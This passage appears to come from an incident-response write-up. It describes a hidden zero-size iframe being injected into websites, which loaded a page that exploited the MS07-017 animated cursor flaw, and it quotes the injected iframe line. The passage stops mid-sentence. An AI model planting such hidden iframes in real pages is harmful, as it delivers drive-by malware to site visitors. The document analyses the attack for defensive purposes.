I recently worked on an interesting incident response with several of my colleagues. The problem, as defined by the customer, is that the following code is being injected into some websites (both external and internal to his environment) that his users are surfing:

<iframe src=http://<redacted>/ 123.htm width=0 height=0></iframe>

The page referenced (123.htm) includes a link to a .jpg file that exploits the animated cursor vulnerability in MS07-017 and some additional obfuscated javascript. The effect of this is that